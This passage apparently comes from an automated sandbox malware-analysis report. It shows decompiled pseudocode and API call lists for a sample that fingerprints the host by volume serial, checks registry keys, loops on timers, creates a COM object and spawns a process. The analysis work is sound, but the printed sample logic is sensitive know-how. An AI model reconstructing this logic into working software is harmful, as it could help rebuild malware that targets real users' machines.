    											 *(_t282 + 4 + _t392 * 8) = _t395;
    											goto L20;
    										}
    										__eflags = _t281 - 1;
    										if(_t281 != 1) {
    											E003CC870(_t400 - 0x5c0, _t281);
    											_t405 = _t408 + 8;
    										}
    										_t283 =  *0x3e8628; // 0x622508
    										 *((intOrPtr*)( *((intOrPtr*)(_t283 + 0xc8))))(0x3e8);
    										goto L70;
    									}
    									__eflags = _t219 - 0x3840;
    									if(__eflags <= 0) {
    										goto L20;
    									}
    									goto L15;
    								}
    								_t394 =  *0x3e8628; // 0x622508
    								 *((intOrPtr*)( *((intOrPtr*)(_t394 + 0xc8))))(0x3e8);
    								L71:
    								_t332 =  *0x3e857c; // 0x0
    								_t212 =  *(_t400 - 0x5b8);
    								_t316 = _t332 + 1;
    								 *0x3e857c = _t316;
    								__eflags = _t316 -  *((intOrPtr*)(_t212 + 0x18));
    							} while (__eflags < 0);
    							L72:
    							_t214 = E003E0A40(_t395, _t397, __eflags, _t400 - 0xc, _t400 - 0x5b8);
    							_t405 = _t405 + 8;
    							__eflags = _t214;
    							if(_t214 == 0) {
    								__eflags =  *(_t400 - 0x20) - _t289;
    								if(__eflags == 0) {
    									L003E0D30(_t289, _t395, _t397, __eflags, _t400 - 0xc, _t400 - 0x5c0);
    									_t405 = _t405 + 8;
    								}
    							}
    						}
    					}
    				}
    				L5:
    				E003C1700(_t400 - 0xc);
    				E003CF850(_t289, _t400 - 0x5c0);
    				E003CC930(_t400 - 4);
    				goto L76;
    			}

    APIs
    • ??3@YAXPAX@Z.MSVCRT ref: 003CFD71
      • Part of subcall function 003C1B20: memset.MSVCRT ref: 003C1B53
      • Part of subcall function 003C1B20: memset.MSVCRT ref: 003C1B62
      • Part of subcall function 003C1B20: ??2@YAPAXI@Z.MSVCRT ref: 003C1B79
      • Part of subcall function 003C1B20: ??2@YAPAXI@Z.MSVCRT ref: 003C1B98
    • ??2@YAPAXI@Z.MSVCRT ref: 003CFDC4
      • Part of subcall function 003C1F00: memcpy.MSVCRT ref: 003C1F9C
      • Part of subcall function 003C69F0: ??2@YAPAXI@Z.MSVCRT ref: 003C6A09
      • Part of subcall function 003C69F0: ??2@YAPAXI@Z.MSVCRT ref: 003C6A24
      • Part of subcall function 003C69F0: ??3@YAXPAX@Z.MSVCRT ref: 003C6ADA
      • Part of subcall function 003C69F0: ??3@YAXPAX@Z.MSVCRT ref: 003C6B34
      • Part of subcall function 003C69F0: ??3@YAXPAX@Z.MSVCRT ref: 003C6B88
      • Part of subcall function 003C69F0: ??3@YAXPAX@Z.MSVCRT ref: 003C6C0A
      • Part of subcall function 003C69F0: ??3@YAXPAX@Z.MSVCRT ref: 003C6C1E
      • Part of subcall function 003CF850: ??3@YAXPAX@Z.MSVCRT ref: 003CF90D
      • Part of subcall function 003CF850: ??3@YAXPAX@Z.MSVCRT ref: 003CF924
      • Part of subcall function 003CF850: ??3@YAXPAX@Z.MSVCRT ref: 003CF955
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
      • Part of subcall function 003C9480: FreeLibrary.KERNELBASE(00000000,003D04F0), ref: 003C94B1
    • ExitProcess.KERNEL32 ref: 003D04F6
      • Part of subcall function 003D1D90: LoadLibraryA.KERNEL32(?), ref: 003D1DB7
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
      • Part of subcall function 003D1D90: GetProcessHeap.KERNEL32 ref: 003D1E45
      • Part of subcall function 003D1D90: RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
      • Part of subcall function 003D1D90: RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd

    Control-flow Graph

    C-Code - Quality: 88%
    			E003CF0B0(intOrPtr _a4) {
    				long _v8;
    				intOrPtr _v14;
    				signed short _v18;
    				intOrPtr _v24;
    				short _v34;
    				intOrPtr _v38;
    				short _v40;
    				char _v240;
    				short _v760;
    				void* _t46;
    				void* _t55;
    
    				_v8 = 0;
    				memset( &_v760, 0, 0x208);
    				if(GetWindowsDirectoryW( &_v760, 0x208) == 0) {
    					_v760 = 0x43;
    				}
    				_v40 = _v760;
    				_v38 = 0x5c003a;
    				_v34 = 0;
    				GetVolumeInformationW( &_v40, 0, 0,  &_v8, 0, 0, 0, 0); // executed
    				_v24 = E003E1200( &_v8);
    				E003E1200( &_v8);
    				_v18 = E003E1200( &_v8);
    				_t46 = 0;
    				do {
    					 *((char*)(_t55 + _t46 - 0xc)) = E003E1200( &_v8);
    					_t46 = _t46 + 1;
    					_t61 = _t46 - 8;
    				} while (_t46 < 8);
    				E003C9090(_t61, _a4, 0xa1);
    				E003C9090(_t61,  &_v240, 0xc6);
    				_push(_v14);
    				_push(_v18 & 0x0000ffff);
    				return E003D0C10(_a4, 0x64,  &_v240, _v24);
    			}

    APIs
    • memset.MSVCRT ref: 003CF0CE
    • GetWindowsDirectoryW.KERNEL32(?,00000208), ref: 003CF0E2
    • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003CF11E
      • Part of subcall function 003D0C10: _vsnwprintf.MSVCRT ref: 003D0C42
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd

    Control-flow Graph

    control_flow_graph 712 3ccea0-3ccea9 713 3cceab-3cceaf 712->713 714 3cceb0-3cceb6 712->714 715 3ccebc-3ccec5 lstrlenW 714->715 716 3ccf41-3ccf46 714->716 715->716 717 3ccec7-3ccf01 RegOpenKeyExW * 2 715->717 718 3ccf26 717->718 719 3ccf03-3ccf20 RegOpenKeyExW 717->719 721 3ccf28-3ccf40 718->721 719->718 720 3ccf22-3ccf24 719->720 720->721
    C-Code - Quality: 100%
    			E003CCEA0(void* _a4, short* _a8) {
    				long _t16;
    				long _t21;
    				void* _t24;
    				intOrPtr _t28;
    				void* _t34;
    				short* _t36;
    
    				_t34 = _a4;
    				if(_t34 != 0) {
    					_t36 = _a8;
    					if(_t36 == 0 || lstrlenW(_t36) == 0) {
    						return 0;
    					} else {
    						RegOpenKeyExW(_t34, _t36, 0, 0x20119,  &_a4);
    						_t16 = RegOpenKeyExW(_t34, _t36, 0, 0x20119,  &_a4); // executed
    						if(_t16 == 2) {
    							L7:
    							_t24 = 0;
    						} else {
    							_t21 = RegOpenKeyExW(_t34, _t36, 0, 0x20119,  &_a4); // executed
    							if(_t21 != 0) {
    								goto L7;
    							} else {
    								_t24 = 1;
    							}
    						}
    						_t28 =  *0x3e8628; // 0x622508
    						 *((intOrPtr*)( *((intOrPtr*)(_t28 + 0x198))))(_a4);
    						return _t24;
    					}
    				} else {
    					return 0;
    				}
    			}

    APIs
    • lstrlenW.KERNEL32(?,?,?,?,003C97FA,?,?), ref: 003CCEBD
    • RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?,?,?,003C97FA,?,?), ref: 003CCEE1
    • RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?,?,?,003C97FA,?,?), ref: 003CCEFC
    • RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?,?,?,003C97FA,?,?), ref: 003CCF1C
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd

    Control-flow Graph

    C-Code - Quality: 54%
    			E003CFD15() {
    				intOrPtr _t183;
    				void* _t184;
    				void* _t187;
    				int _t194;
    				signed int* _t204;
    				int _t213;
    				int _t218;
    				int _t220;
    				int _t224;
    				int _t225;
    				int _t227;
    				int _t230;
    				void* _t232;
    				int _t236;
    				int _t237;
    				int _t239;
    				int _t241;
    				int _t242;
    				int _t243;
    				int _t244;
    				int _t248;
    				int _t249;
    				int _t253;
    				int _t255;
    				int _t261;
    				int _t267;
    				int _t269;
    				int _t270;
    				int _t272;
    				int _t282;
    				int _t287;
    				intOrPtr _t288;
    				int _t289;
    				signed int* _t299;
    				int _t302;
    				signed int _t322;
    				signed int _t325;
    				signed int _t341;
    				int _t346;
    				int _t361;
    				signed int _t363;
    				int _t374;
    				int _t376;
    				int _t377;
    				int _t378;
    				signed short* _t379;
    				int _t384;
    				signed int _t385;
    				int _t390;
    				int _t396;
    				signed int _t398;
    				signed int _t405;
    				int _t407;
    				int _t408;
    				void* _t409;
    				void* _t411;
    				int _t412;
    				void* _t413;
    				void* _t414;
    				void* _t415;
    				void* _t416;
    				void* _t417;
    				void* _t421;
    				void* _t422;
    				void* _t423;
    				void* _t427;
    
    				E003CE7D0(_t413 - 0x9c0,  *((intOrPtr*)(_t413 - 0x34))); // executed
    				_t415 = _t414 + 8;
    				_t183 = E003E1210();
    				_push(8);
    				 *0x3e8580 = _t183; // executed
    				L003CA47E(); // executed
    				_t416 = _t415 + 4;
    				if(_t183 == _t298) {
    					_t410 = 0;
    					__eflags = 0;
    				} else {
    					_t410 = E003CE850(_t183);
    				}
    				_t184 = E003C3D50(_t410); // executed
    				if(_t184 != 0) {
    					__eflags = _t410 - _t298;
    					if(__eflags != 0) {
    						E003C2420(_t410);
    						_push(_t410);
    						L003C1CB0();
    						_t416 = _t416 + 4;
    					}
    					_t302 =  *0x3e8628; // 0x622508
    					 *0x3e8570 = _t298;
    					 *0x3e8584 = _t298;
    					 *0x3e8574 = _t298;
    					 *0x3e8578 = _t298;
    					 *((intOrPtr*)( *((intOrPtr*)(_t302 + 0xcc))))(0x3e8594, 0x800);
    					E003C1B20(_t413 - 0x5c0,  *((intOrPtr*)(_t302 + 0xcc)), __eflags);
    					_t187 = E003CBB30(_t413 - 0xc);
    					_push(0x34);
    					 *(_t413 - 0x58) = _t298;
    					 *(_t413 - 0x28) = _t298;
    					L003CA47E();
    					_t417 = _t416 + 4;
    					__eflags = _t187 - _t298;
    					if(__eflags == 0) {
    						 *(_t413 - 0x5b8) = _t298;
    					} else {
    						 *(_t413 - 0x5b8) = E003C70B0(_t187);
    					}
    					E003C9090(__eflags, _t413 - 0x9c0, 3);
    					E003CF550(_t413 - 0x50, _t298, _t413 - 0x9c0, 0xa, _t413 - 0x54, _t413 - 0x50);
    					E003C1F00(_t413 - 0xc,  *((intOrPtr*)(_t413 - 0x54)),  *((intOrPtr*)(_t413 - 0x50)));
    					_t194 = E003C69F0(_t413 - 0x5b8, _t413 - 0xc, _t413 - 0x5b8);
    					_t416 = _t417 + 0x24;
    					__eflags = _t194;
    					if(_t194 != 0) {
    						 *(_t413 - 0x5c0) = _t413 - 0xc;
    						__eflags = E003D0AD0(_t413 - 0x5c0,  *((intOrPtr*)( *(_t413 - 0x5b8) + 0x14)));
    						if(__eflags == 0) {
    							goto L12;
    						}
    						E003C5700( *((intOrPtr*)(_t413 - 0x5bc)), __eflags);
    						 *0x3e85ac = _t298;
    						 *(_t413 - 0x30) = _t298;
    						 *(_t413 - 0x2c) = _t298;
    						 *(_t413 - 0x14) = _t298;
    						 *(_t413 - 0x10) = _t298;
    						 *(_t413 - 0x3c) = _t298;
    						 *(_t413 - 0x38) = _t298;
    						 *(_t413 - 0x44) = _t298;
    						 *(_t413 - 0x40) = _t298;
    						 *((intOrPtr*)( *( *0x3e8628)))(_t298, _t298, E003E08A0, _t413 - 0x5c0, _t298, _t413 - 0x74);
    						 *(_t413 - 0x24) = _t298;
    						while(1) {
    							_t218 =  *(_t413 - 0x5b8);
    							_t325 = 0;
    							 *0x3e857c = 0;
    							 *(_t413 - 0x20) = _t298;
    							__eflags =  *((intOrPtr*)(_t218 + 0x18)) - _t298;
    							if(__eflags <= 0) {
    								goto L79;
    							}
    							do {
    								_t384 =  *( *((intOrPtr*)(_t218 + 0x20)) + _t325 * 4);
    								_t224 = L003C94D0(_t413 - 0x5c0,  *((intOrPtr*)( *((intOrPtr*)(_t218 + 0x1c)) + _t325 * 4)), _t384);
    								__eflags = _t224;
    								if(_t224 != 0) {
    									__imp___time64(_t298);
    									_t408 = _t384;
    									_t385 =  *0x3e857c; // 0x0
    									_t421 = _t416 + 4;
    									_t410 = _t224;
    									_t225 = _t224 -  *((intOrPtr*)( *((intOrPtr*)( *(_t413 - 0x5b8) + 0x24)) + _t385 * 8));
    									__eflags = _t225;
    									asm("sbb ebx, [ecx+edx*8+0x4]");
    									 *(_t413 - 0x48) = _t408;
    									if(__eflags < 0) {
    										L27:
    										_t298 = 0;
    										_t227 = E003D1B80(_t410, _t413 - 0xc, _t413 - 0x5c0, _t413 - 0x28);
    										_t416 = _t421 + 0xc;
    										__eflags = _t227;
    										if(_t227 == 0) {
    											 *(_t413 - 0x20) =  *(_t413 - 0x20) + 1;
    											 *( *((intOrPtr*)(_t413 - 0x5bc)) + 0xc) =  *(_t413 - 0x28);
    											_t230 = _t410 -  *(_t413 - 0x3c);
    											__eflags = _t230;
    											asm("sbb edx, [ebp-0x38]");
    											 *(_t413 - 0x48) = _t408;
    											if(__eflags < 0) {
    												L36:
    												E003C42A0(__eflags, _t413 - 0x5c0);
    												_t422 = _t416 + 4;
    												_t232 = E003D12C0();
    												_push(4);
    												__eflags = _t232 - _t298;
    												if(__eflags >= 0) {
    													if(__eflags != 0) {
    														_push(_t413 - 0x9c0);
    														E003C9090(__eflags);
    														E003C9090(__eflags, _t413 - 0xdc0, 7);
    														_push(_t413 - 0xdc0);
    														_push(_t413 - 0x9c0);
    														_push(0xe);
    														_t390 = _t413 - 0x5c0;
    														_push(_t390);
    													} else {
    														_push(_t413 - 0x9c0);
    														E003C9090(__eflags);
    														E003C9090(__eflags, _t413 - 0xdc0, 6);
    														_push(_t413 - 0xdc0);
    														_t390 = _t413 - 0x9c0;
    														_push(_t390);
    														_push(0xe);
    														_push(_t413 - 0x5c0);
    													}
    												} else {
    													_push(_t413 - 0x9c0);
    													E003C9090(__eflags);
    													E003C9090(__eflags, _t413 - 0xdc0, 5);
    													_t390 = _t413 - 0xdc0;
    													_push(_t390);
    													_push(_t413 - 0x9c0);
    													_push(0xe);
    													_push(_t413 - 0x5c0);
    												}
    												_t236 = E003C5A10();
    												_t423 = _t422 + 0x20;
    												 *(_t413 - 0x48) = _t298;
    												do {
    													__imp___time64(0);
    													_t410 = _t236;
    													_t237 =  *0x3e8570; // 0x0
    													_t416 = _t423 + 4;
    													_t408 = _t390;
    													__eflags = _t237 - 2;
    													if(_t237 == 2) {
    														L46:
    														_t239 = E003C36E0(_t408, _t410, _t413 - 0xc, _t413 - 0x5c0,  *(_t413 - 0x14),  *(_t413 - 0x10));
    														_t416 = _t416 + 0x10;
    														asm("sbb edx, 0x0");
    														 *(_t413 - 0x14) = _t410 - 0x708;
    														 *(_t413 - 0x10) = _t408;
    														__eflags = _t239 - 1;
    														if(_t239 == 1) {
    															 *0x3e85ac = _t239;
    														}
    														L48:
    														_t241 = _t410 -  *(_t413 - 0x44);
    														__eflags = _t241;
    														asm("sbb ecx, [ebp-0x40]");
    														 *(_t413 - 0x5c) = _t408;
    														if(__eflags < 0) {
    															L55:
    															_t410 = _t410 -  *(_t413 - 0x30);
    															__eflags = _t410;
    															asm("sbb edi, [ebp-0x2c]");
    															 *(_t413 - 0x5c) = _t408;
    															if(__eflags < 0) {
    																L62:
    																_t242 = E003C9890( *((intOrPtr*)(_t413 - 0x5bc)));
    																__eflags = _t242;
    																if(_t242 == 0) {
    																	L77:
    																	_t298 = 0;
    																	__eflags = 0;
    																	goto L78;
    																}
    																_push(1);
    																_push(_t413 - 0x5c0);
    																_t243 = E003C5A10();
    																_t416 = _t416 + 8;
    																__eflags = _t243;
    																if(__eflags == 0) {
    																	goto L77;
    																}
    																_t390 = _t413 - 0x5c0;
    																_t244 = E003C7560(_t298, __eflags, _t390);
    																_t416 = _t416 + 4;
    																__eflags = _t244;
    																if(_t244 == 0) {
    																	__eflags =  *0x3e85ac;
    																	if( *0x3e85ac != 0) {
    																		L82:
    																		E003C1700(_t413 - 0xc);
    																		E003CF850(_t298, _t413 - 0x5c0);
    																		E003CC930(_t413 - 4);
    																		_t298 = 0;
    																		__eflags = 0;
    																		goto L83;
    																	}
    																	goto L77;
    																}
    																__eflags =  *0x3e85ac;
    																if( *0x3e85ac != 0) {
    																	goto L82;
    																}
    																_t248 =  *0x3e8584; // 0x0
    																_t410 = 0xa;
    																__eflags = _t248;
    																if(_t248 == 0) {
    																	_t249 =  *(_t413 - 0x24);
    																	__eflags = _t249;
    																	if(_t249 <= 0) {
    																		while(1) {
    																			L70:
    																			_t346 =  *0x3e8584; // 0x0
    																			__eflags = _t346;
    																			if(_t346 != 0) {
    																				goto L72;
    																			}
    																			_t390 =  *0x3e8628; // 0x622508
    																			 *((intOrPtr*)( *((intOrPtr*)(_t390 + 0xc8))))(0x4e20);
    																			_t410 = _t410 - 1;
    																			__eflags = _t410;
    																			if(_t410 > 0) {
    																				continue;
    																			}
    																			goto L72;
    																		}
    																		goto L72;
    																	}
    																	L69:
    																	_t253 = _t249 - 1;
    																	__eflags = _t253;
    																	 *(_t413 - 0x24) = _t253;
    																	_t410 = 1;
    																	goto L70;
    																}
    																_t141 = _t410 - 5; // 0x5
    																_t249 = _t141;
    																 *0x3e8584 = 0;
    																goto L69;
    															}
    															if(__eflags > 0) {
    																L58:
    																_t410 = E003CF2D0(_t413 - 0x5c0);
    																_t255 = E003C99A0(_t298, _t413 - 0x19, _t408, _t254, _t254);
    																_push(8);
    																__eflags = _t255;
    																if(__eflags == 0) {
    																	_push(_t413 - 0x9c0);
    																	E003C9090(__eflags);
    																	E003C9090(__eflags, _t413 - 0xdc0, 0xa);
    																	_push(_t413 - 0xdc0);
    																	_t396 = _t413 - 0x9c0;
    																	_push(_t396);
    																	_push(0xe);
    																	_push(_t413 - 0x5c0);
    																} else {
    																	_push(_t413 - 0x9c0);
    																	E003C9090(__eflags);
    																	E003C9090(__eflags, _t413 - 0xdc0, 9);
    																	_t396 = _t413 - 0xdc0;
    																	_push(_t396);
    																	_push(_t413 - 0x9c0);
    																	_push(0xe);
    																	_push(_t413 - 0x5c0);
    																}
    																E003C5A10();
    																_t261 = E003CBB40(_t410);
    																__imp___time64(0);
    																_t416 = _t416 + 0x28;
    																 *(_t413 - 0x30) = _t261;
    																 *(_t413 - 0x2c) = _t396;
    																goto L62;
    															}
    															__eflags = _t410 - 0x7080;
    															if(_t410 <= 0x7080) {
    																goto L62;
    															}
    															goto L58;
    														}
    														if(__eflags > 0) {
    															L51:
    															_t398 =  *0x3e857c; // 0x0
    															_t267 = _t410 -  *((intOrPtr*)( *((intOrPtr*)( *(_t413 - 0x5b8) + 0x28)) + _t398 * 8));
    															__eflags = _t267;
    															_t298 = _t408;
    															asm("sbb ebx, [ecx+edx*8+0x4]");
    															 *(_t413 - 0x5c) = _t408;
    															if(__eflags < 0) {
    																goto L55;
    															}
    															if(__eflags > 0) {
    																L54:
    																 *(_t413 - 0x44) = _t410;
    																 *(_t413 - 0x40) = _t408;
    																_t269 = E003C1FE0(_t298, _t408, _t410, _t413 - 0xc, _t413 - 0x5c0, _t413 - 0x5b8);
    																_t416 = _t416 + 0xc;
    																__eflags = _t269;
    																if(_t269 != 0) {
    																	_t270 = E003D0AD0(_t413 - 0x5c0,  *((intOrPtr*)( *(_t413 - 0x5b8) + 0x14)));
    																	__eflags = _t270;
    																	if(_t270 == 0) {
    																		goto L82;
    																	}
    																	 *0x3e857c = 0;
    																	goto L77;
    																}
    																goto L55;
    															}
    															__eflags = _t267 - 0x3840;
    															if(_t267 <= 0x3840) {
    																goto L55;
    															}
    															goto L54;
    														}
    														__eflags = _t241 - 0x4b0;
    														if(_t241 <= 0x4b0) {
    															goto L55;
    														}
    														goto L51;
    													}
    													_t272 = _t410 -  *(_t413 - 0x14);
    													__eflags = _t272;
    													asm("sbb ecx, [ebp-0x10]");
    													 *(_t413 - 0x5c) = _t408;
    													if(__eflags < 0) {
    														goto L48;
    													}
    													if(__eflags > 0) {
    														goto L46;
    													}
    													__eflags = _t272 - 0xe10;
    													if(_t272 <= 0xe10) {
    														goto L48;
    													}
    													goto L46;
    													L72:
    													_t236 =  *(_t413 - 0x48) + 1;
    													 *(_t413 - 0x48) = _t236;
    													__eflags = _t236 - 0x64;
    												} while (_t236 < 0x64);
    												goto L77;
    											}
    											if(__eflags > 0) {
    												L34:
    												_t282 = E003CAC90( *(_t413 - 0x5b8), _t413 - 0x5c0);
    												_t416 = _t416 + 8;
    												__eflags = _t282;
    												if(__eflags == 0) {
    													goto L78;
    												}
    												 *(_t413 - 0x3c) = _t410;
    												 *(_t413 - 0x38) = _t408;
    												goto L36;
    											}
    											__eflags = _t230 - 0xe10;
    											if(__eflags <= 0) {
    												goto L36;
    											}
    											goto L34;
    										}
    										__eflags = _t227 - 1;
    										if(_t227 != 1) {
    											E003CC870(_t413 - 0x5c0, _t227);
    											_t416 = _t416 + 8;
    										}
    										_t361 =  *0x3e8628; // 0x622508
    										 *((intOrPtr*)( *((intOrPtr*)(_t361 + 0xc8))))(0x3e8);
    										goto L78;
    									}
    									if(__eflags > 0) {
    										L22:
    										_t287 = E003CD890(_t410, __eflags, _t413 - 0xc, _t413 - 0x5c0, _t413 - 0x58);
    										_t421 = _t421 + 0xc;
    										__eflags = _t287;
    										if(_t287 == 0) {
    											_t288 =  *((intOrPtr*)( *(_t413 - 0x5b8) + 0x24));
    											_t363 =  *0x3e857c; // 0x0
    											 *(_t288 + _t363 * 8) = _t410;
    											_t405 =  *0x3e857c; // 0x0
    											 *(_t288 + 4 + _t405 * 8) = _t408;
    											goto L27;
    										}
    										__eflags = _t287 - 1;
    										if(_t287 != 1) {
    											E003CC870(_t413 - 0x5c0, _t287);
    											_t416 = _t421 + 8;
    										}
    										_t289 =  *0x3e8628; // 0x622508
    										 *((intOrPtr*)( *((intOrPtr*)(_t289 + 0xc8))))(0x3e8);
    										goto L77;
    									}
    									__eflags = _t225 - 0x3840;
    									if(__eflags <= 0) {
    										goto L27;
    									}
    									goto L22;
    								}
    								_t407 =  *0x3e8628; // 0x622508
    								 *((intOrPtr*)( *((intOrPtr*)(_t407 + 0xc8))))(0x3e8);
    								L78:
    								_t341 =  *0x3e857c; // 0x0
    								_t218 =  *(_t413 - 0x5b8);
    								_t325 = _t341 + 1;
    								 *0x3e857c = _t325;
    								__eflags = _t325 -  *((intOrPtr*)(_t218 + 0x18));
    							} while (__eflags < 0);
    							L79:
    							_t220 = E003E0A40(_t408, _t410, __eflags, _t413 - 0xc, _t413 - 0x5b8);
    							_t416 = _t416 + 8;
    							__eflags = _t220;
    							if(_t220 == 0) {
    								__eflags =  *(_t413 - 0x20) - _t298;
    								if(__eflags == 0) {
    									L003E0D30(_t298, _t408, _t410, __eflags, _t413 - 0xc, _t413 - 0x5c0);
    									_t416 = _t416 + 8;
    								}
    							}
    						}
    					} else {
    						L12:
    						E003C1700(_t413 - 0xc);
    						E003CF850(_t298, _t413 - 0x5c0);
    						E003CC930(_t413 - 4);
    						goto L83;
    					}
    				} else {
    					E003CC930(_t413 - 4);
    					L83:
    					_t427 =  *0x3e85ac - _t298; // 0x0
    					if(_t427 == 0) {
    						L96:
    						E003C9480();
    						E003C7E10();
    						ExitProcess(_t298);
    					}
    					_t374 =  *0x3e8628; // 0x622508
    					_t411 = 0;
    					 *((intOrPtr*)(_t413 - 0x70)) = 0;
    					 *((intOrPtr*)(_t413 - 0x6c)) = 0;
    					 *((intOrPtr*)(_t413 - 0x68)) = 0;
    					 *((intOrPtr*)(_t413 - 0x64)) = 0;
    					 *(_t413 - 0x18) = 0;
    					 *((intOrPtr*)(_t413 - 0xb8)) = 0x44;
    					 *((intOrPtr*)( *((intOrPtr*)(_t374 + 0xb8))))(_t413 - 0xb8);
    					E003C8030(_t413 - 0x18);
    					_t204 = E003D1D90(0x20a, 0);
    					_t299 = _t204;
    					if(_t299 == 0) {
    						L95:
    						_t376 =  *0x3e8628; // 0x622508
    						 *((intOrPtr*)( *((intOrPtr*)(_t376 + 0xd8))))( *(_t413 - 0x18), _t411, _t411, _t411, _t411, _t411, _t411, _t299, _t413 - 0xb8, _t413 - 0x70);
    						_t377 =  *0x3e8628; // 0x622508
    						 *((intOrPtr*)( *((intOrPtr*)(_t377 + 0xf8))))( *((intOrPtr*)(_t413 - 0x70)));
    						_t378 =  *0x3e8628; // 0x622508
    						 *((intOrPtr*)( *((intOrPtr*)(_t378 + 0xf8))))( *((intOrPtr*)(_t413 - 0x6c)));
    						E003CBB40( *(_t413 - 0x18));
    						_t298 = 0;
    						goto L96;
    					}
    					_t379 =  *(_t413 - 0x18);
    					_t412 = 0x104;
    					_t409 = 0;
    					while(1) {
    						_t170 = _t412 + 0x7ffffefa; // 0x7ffffffe
    						if(_t170 == 0) {
    							break;
    						}
    						_t322 =  *_t379 & 0x0000ffff;
    						if(_t322 == 0) {
    							break;
    						}
    						 *_t204 = _t322;
    						_t204 =  &(_t204[0]);
    						_t379 =  &(_t379[1]);
    						_t412 = _t412 - 1;
    						if(_t412 != 0) {
    							continue;
    						}
    						L91:
    						_t204 = _t204 - 2;
    						_t409 = 0x8007007a;
    						L92:
    						 *_t204 = 0;
    						if(_t409 >= 0) {
    							_t213 =  *0x3e8628; // 0x622508
    							 *((intOrPtr*)( *((intOrPtr*)(_t213 + 0x1e8))))(_t299);
    						}
    						_t411 = 0;
    						goto L95;
    					}
    					__eflags = _t412;
    					if(_t412 != 0) {
    						goto L92;
    					}
    					goto L91;
    				}
    			}

    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 003CFD34
      • Part of subcall function 003CE850: CoCreateInstance.OLE32(003E638C,00000000,00000001,003E617C,?), ref: 003CE8A7
      • Part of subcall function 003C3D50: VariantInit.OLEAUT32(?), ref: 003C6306
      • Part of subcall function 003C3D50: VariantInit.OLEAUT32(?), ref: 003C631E
      • Part of subcall function 003C3D50: VariantClear.OLEAUT32(?), ref: 003C642C
      • Part of subcall function 003C3D50: VariantClear.OLEAUT32(?), ref: 003C6432
      • Part of subcall function 003C3D50: VariantClear.OLEAUT32(?), ref: 003C6438
      • Part of subcall function 003C3D50: VariantInit.OLEAUT32(?), ref: 003C6479
      • Part of subcall function 003C3D50: VariantInit.OLEAUT32(?), ref: 003C6497
      • Part of subcall function 003C3D50: VariantInit.OLEAUT32(?), ref: 003C64B8
      • Part of subcall function 003C3D50: VariantClear.OLEAUT32(?), ref: 003C658F
      • Part of subcall function 003C3D50: VariantClear.OLEAUT32(?), ref: 003C6598
      • Part of subcall function 003C3D50: VariantClear.OLEAUT32(?), ref: 003C659E
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
      • Part of subcall function 003C9480: FreeLibrary.KERNELBASE(00000000,003D04F0), ref: 003C94B1
    • ExitProcess.KERNEL32 ref: 003D04F6
      • Part of subcall function 003D1D90: LoadLibraryA.KERNEL32(?), ref: 003D1DB7
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
      • Part of subcall function 003D1D90: GetProcessHeap.KERNEL32 ref: 003D1E45
      • Part of subcall function 003D1D90: RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
      • Part of subcall function 003D1D90: RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd


    C-Code - Quality: 100%
    			E003E0790(short* __edi, char __esi, void* __eflags) {
    				void _v516;
    				void* __ebx;
    				void* _t18;
    				void* _t19;
    				void* _t29;
    
    				_t29 = __eflags;
